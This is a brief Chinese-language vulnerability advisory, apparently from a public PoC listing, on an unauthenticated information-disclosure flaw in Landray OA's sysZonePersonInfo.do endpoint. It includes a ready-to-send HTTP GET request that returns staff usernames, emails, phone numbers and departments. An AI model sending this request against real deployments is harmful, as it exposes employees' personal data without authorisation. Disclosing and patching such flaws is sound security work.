蓝凌OA /sys/zone/sys_zone_personInfo/sysZonePersonInfo.do 信息泄露漏洞

2026-04-30 蓝凌OA PoC Public

Description

蓝凌OA(Landray OA)是深圳市蓝凌软件股份有限公司推出的企业级协同办公平台,是国内领先的OA软件厂商之一。该产品涵盖知识管理、流程管理、协同办公、人力资源管理、财务管理等核心业务模块,支持移动办公、智能审批、数据分析等创新功能,广泛应用于政府、金融、制造、能源、交通等国民经济重点行业。蓝凌OA的 /sys/zone/sys_zone_personInfo/sysZonePersonInfo.do 接口存在信息泄露漏洞,未授权攻击者可直接访问该接口获取系统所有人员信息,包括用户名、邮箱、手机号码、姓名、部门、性别等敏感信息,导致严重的信息泄露风险。

PoC

GET /sys/zone/sys_zone_personInfo/sysZonePersonInfo.do?.js?&method=searchPerson&orderby&ordertype=up&rowsize=5&s_ajax=true HTTP/1.1
Host:

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities